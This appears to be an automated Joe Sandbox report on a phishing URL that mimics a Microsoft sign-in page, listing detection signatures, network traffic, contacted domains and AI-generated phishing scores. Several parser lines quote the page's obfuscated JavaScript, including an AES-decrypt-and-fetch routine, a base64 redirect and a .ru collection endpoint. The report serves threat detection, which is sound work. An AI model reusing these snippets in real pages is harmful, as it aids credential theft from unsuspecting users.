Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
https://sesworld.com.au:443/it/mount/

Overview

General Information

Sample URL:https://sesworld.com.au:443/it/mount/
Analysis ID:1510217

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
HTML page contains hidden URLs
HTML page contains suspicious javascript code
Phishing site detected (based on image similarity)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 2992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sesworld.com.au/it/mount/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1796 --field-trial-handle=1996,i,5005582365850163615,345631890189895829,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

  • Phishing
  • Compliance
  • Networking
  • System Summary
  • Boot Survival

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://sesworld.com.au/it/mount/LLM: Score: 8 Reasons: The domain'sesworld.com.au' does not match the brand name 'Joyce Morgan', and the domain name does not seem to be directly related to the brand. This raises concerns about the legitimacy or authenticity of the message. DOM: 0.0.pages.csv
Source: https://sesworld.com.au/mount/it/LLM: Score: 10 Reasons: The domain'sesworld.com.au' does not match the legitimate domain associated with Microsoft, which is'microsoft.com'. The presence of a Microsoft logo and sign-in form does not necessarily indicate a legitimate website, as phishing sites often mimic legitimate websites to trick users into revealing sensitive information. DOM: 1.4.pages.csv
Source: https://sesworld.com.au/mount/it/LLM: Score: 8 Reasons: The domain'sesworld.com.au' does not match the brand name 'Sign in' displayed on the webpage, which is a potential security risk. The presence of a country-code top-level domain '.com.au' suggests that the website is targeted towards Australian users, but the brand name does not indicate any association with a specific Australian service. The minimalistic design of the webpage is effective in guiding the user's attention towards the sign-in field, but this does not necessarily indicate legitimacy. DOM: 1.3.pages.csv
Source: https://sesworld.com.au/mount/it/HTTP Parser: https://stellarbyteae.ru///8832.php
Source: https://sesworld.com.au/mount/it/HTTP Parser: window.location.href = atob(
Source: https://sesworld.com.au/mount/it/Matcher: Found strong image similarity, brand: MICROSOFT
Source: https://sesworld.com.au/mount/it/HTTP Parser: async function zapper(laborious){ var {a,b,c,d}= json.parse(laborious);return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d),cryptojs.enc.hex.parse(b), {hasher:cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function lackadaisical(){ yawn.hidden = 0; dactyl.hidden = 1; document.write(awaitzapper(await (await fetch(awaitzapper(atob(`eyjhijoinm92ue4xs3ncsuzcl1nyd1jrdlfwdkzsrytmrudrukjrano2bwtnk3u1qmc9iiwiyyi6ijkzmda2nwiyyzlhmtq5m2fjzguzzjhhndnjnjm0zgjmiiwiyii6ija1zteznziwnzzlmwezzwfhnjjjnwq1ndzlntrlngq4ztblnzi0mdmyndlmyzvimzk5mdhhnjrkndq3nguyywm4nwnjy2q4mja5nmi2y2qwnmi1ndvjotbmyzhkyjzhymjlnja5zjmznguznwy1m2zlnzu0nji2odc4nzy5yjrmmtm4othhmzgxzddlmdbhzgnimmi2zte4odvlztjinjk5mtlhndaxzdq1mdnlntjkmjczy2vmnde2ndu5nmy2yzywmmi3mwvjogy0njziote3mgy0ogq4owrlzju4zda2zdnjmtrhmjhhntdiyti2otvly2i5zwrmyzcxyza1mzdlmmixm2qxogvmngi2otqwmjzlzgzjyja0nmm4zdjmmwm2nmm4mzg...
Source: https://sesworld.com.au/mount/it/HTTP Parser: Number of links: 0
Source: https://sesworld.com.au/mount/it/HTTP Parser: Total embedded image size: 45708
Source: https://sesworld.com.au/mount/it/HTTP Parser: Base64 decoded: {"a":"6ovPN1KsBIF\/SrwRQvQpvFlG+fEGQRBkjz6mkM+u5Bg=","c":"930065b2c9a1493acde3f8a43c634dbf","b":"05e1372076e1a3eaa62c5d546e54e4d8e0e72403249fc5b39908a64d4474e2ac85cccd82096b6cd06b545c90fc8db6abbe609f334e35f53fe754626878769b4f13898a381d7e00adcb2b6e1885ee2b...
Source: https://sesworld.com.au/mount/it/HTTP Parser: Title: Log-in to your account securely does not match URL
Source: https://sesworld.com.au/it/mount/HTTP Parser: No favicon
Source: https://sesworld.com.au/it/mount/HTTP Parser: No favicon
Source: https://sesworld.com.au/mount/it/HTTP Parser: No favicon
Source: https://sesworld.com.au/mount/it/HTTP Parser: No favicon
Source: https://sesworld.com.au/mount/it/HTTP Parser: No favicon
Source: https://sesworld.com.au/mount/it/HTTP Parser: No favicon
Source: https://sesworld.com.au/mount/it/HTTP Parser: No <meta name="author".. found
Source: https://sesworld.com.au/mount/it/HTTP Parser: No <meta name="author".. found
Source: https://sesworld.com.au/mount/it/HTTP Parser: No <meta name="author".. found
Source: https://sesworld.com.au/mount/it/HTTP Parser: No <meta name="copyright".. found
Source: https://sesworld.com.au/mount/it/HTTP Parser: No <meta name="copyright".. found
Source: https://sesworld.com.au/mount/it/HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: global trafficDNS traffic detected: DNS query: sesworld.com.au
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: stellarbyteae.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: classification engineClassification label: mal64.phis.win@14/6@22/148
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sesworld.com.au/it/mount/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1796 --field-trial-handle=1996,i,5005582365850163615,345631890189895829,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1796 --field-trial-handle=1996,i,5005582365850163615,345631890189895829,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid AccountsWindows Management Instrumentation1
Scripting		1
Process Injection		3
Masquerading		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder		1
Registry Run Keys / Startup Folder		1
Process Injection		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
https://sesworld.com.au:443/it/mount/0%Avira URL Cloudsafe

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
code.jquery.com
151.101.194.137
truefalse
    		unknown
    cdnjs.cloudflare.com
    		104.17.25.14
    		truefalse
      		unknown
      challenges.cloudflare.com
      		104.18.94.41
      		truefalse
        		unknown
        www.google.com
        		142.250.181.228
        		truefalse
          		unknown
          stellarbyteae.ru
          		172.67.129.11
          		truetrue
            		unknown
            sesworld.com.au
            		192.250.235.25
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://sesworld.com.au/mount/it/true
                		unknown
                https://sesworld.com.au/it/mount/true
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  142.250.185.78
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  104.17.24.14
                  		unknownUnited States
                  		13335CLOUDFLARENETUSfalse
                  172.67.129.11
                  		stellarbyteae.ruUnited States
                  		13335CLOUDFLARENETUStrue
                  1.1.1.1
                  		unknownAustralia
                  		13335CLOUDFLARENETUSfalse
                  216.58.206.74
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  173.194.76.84
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  104.18.94.41
                  		challenges.cloudflare.comUnited States
                  		13335CLOUDFLARENETUSfalse
                  151.101.2.137
                  		unknownUnited States
                  		54113FASTLYUSfalse
                  104.21.2.94
                  		unknownUnited States
                  		13335CLOUDFLARENETUSfalse
                  239.255.255.250
                  		unknownReserved
                  		unknownunknownfalse
                  142.250.181.228
                  		www.google.comUnited States
                  		15169GOOGLEUSfalse
                  142.250.185.195
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  151.101.194.137
                  		code.jquery.comUnited States
                  		54113FASTLYUSfalse
                  142.250.184.206
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  192.250.235.25
                  		sesworld.com.auUnited States
                  		36454CNSV-LLCUStrue
                  104.17.25.14
                  		cdnjs.cloudflare.comUnited States
                  		13335CLOUDFLARENETUSfalse
                  142.250.186.99
                  		unknownUnited States
                  		15169GOOGLEUSfalse

                  Private

                  IP
                  192.168.2.17
                  192.168.2.16
                  192.168.2.4

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1510217
                  Start date and time:2024-09-12 17:32:23 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Sample URL:https://sesworld.com.au:443/it/mount/
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:12
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  Analysis Mode:stream
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal64.phis.win@14/6@22/148
                  • Exclude process from analysis (whitelisted): svchost.exe
                  • Excluded IPs from analysis (whitelisted): 142.250.185.195, 173.194.76.84, 142.250.185.78, 34.104.35.123, 216.58.206.74, 172.217.23.106, 142.250.186.106, 216.58.212.170, 142.250.185.138, 142.250.185.170, 142.250.185.74, 142.250.185.106, 142.250.184.202, 142.250.185.202, 142.250.186.74, 142.250.185.234, 172.217.16.202, 216.58.212.138, 172.217.18.10, 216.58.206.42, 199.232.210.172
                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
                  • Not all processes where analyzed, report is missing behavior information
                  • VT rate limit hit for: https://sesworld.com.au:443/it/mount/

                  LLM Input / Output

                  InputOutput
                  URL: https://sesworld.com.au/it/mount/ Model: jbxai
                  {
"brand":["Joyce Morgan"],
"contains_trigger_text":true,
"prominent_button_name":"Submit",
"text_input_field_labels":["Enter your email address to proceed"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
                  URL: https://sesworld.com.au/it/mount/ Model: jbxai
                  {
"phishing_score":8,
"brands":["Joyce Morgan"],
"brand_matches_associated_domain":false,
"reasons":"The domain'sesworld.com.au' does not match the brand name 'Joyce Morgan',
 and the domain name does not seem to be directly related to the brand. This raises concerns about the legitimacy or authenticity of the message.",
"brand_matches":[false],
"url_match":true}
                  URL: https://sesworld.com.au/it/mount/ Model: jbxai
                  {
"brand":["Joyce Morgan"],
"contains_trigger_text":true,
"prominent_button_name":"Submit",
"text_input_field_labels":["Enter your email address to proceed"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
                  URL: https://sesworld.com.au/mount/it/ Model: jbxai
                  {
"brand":["Globi"],
"contains_trigger_text":true,
"prominent_button_name":"Next",
"text_input_field_labels":["Email,
 phone,
 or Skype",
"No account? Create one! Can't access your account?"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
                  URL: https://sesworld.com.au/mount/it/ Model: jbxai
                  {
"brand":["Microsoft"],
"contains_trigger_text":false,
"prominent_button_name":"Sign in",
"text_input_field_labels":["Email,
 phone,
 or Skype",
"Password",
"Sign-in options"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
                  URL: https://sesworld.com.au/mount/it/ Model: jbxai
                  {
"phishing_score":10,
"brands":["Microsoft"],
"brand_matches_associated_domain":false,
"reasons":"The domain'sesworld.com.au' does not match the legitimate domain associated with Microsoft,
 which is'microsoft.com'. The presence of a Microsoft logo and sign-in form does not necessarily indicate a legitimate website,
 as phishing sites often mimic legitimate websites to trick users into revealing sensitive information.",
"brand_matches":[false],
"url_match":true}
                  URL: https://sesworld.com.au/mount/it/ Model: jbxai
                  {
"phishing_score":8,
"brands":["Sign in"],
"brand_matches_associated_domain":false,
"reasons":"The domain'sesworld.com.au' does not match the brand name 'Sign in' displayed on the webpage,
 which is a potential security risk. The presence of a country-code top-level domain '.com.au' suggests that the website is targeted towards Australian users,
 but the brand name does not indicate any association with a specific Australian service. The minimalistic design of the webpage is effective in guiding the user's attention towards the sign-in field,
 but this does not necessarily indicate legitimacy.",
"brand_matches":[false],
"url_match":true}
                  URL: https://sesworld.com.au/mount/it/ Model: jbxai
                  {
"brand":["Microsoft"],
"contains_trigger_text":false,
"prominent_button_name":"Next",
"text_input_field_labels":["username",
"password"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

                  Created / dropped Files

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 14:32:53 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2673
                  Entropy (8bit):3.9867005441217542
                  Encrypted:false
                  SSDEEP:
                  MD5:955A3B3BB25C047AAC1AB4AA5426DAF7
                  SHA1:C75C3E290D45DF57DB67C8FF19AE7146BA3AA946
                  SHA-256:316EA3BC6D772D5E1F474555D15517AA9BD5CFF809397FFDAEB995E92586CDA9
                  SHA-512:19E82C6657D0D54FE5F40C85B1ACB86A54517BC31907FDD3CB382F7D90943E499E1215353671B5A155683B9DCC4F15F8C509AD7ACF60278A9D2C72286F57BBCD
                  Malicious:false
                  Reputation:unknown
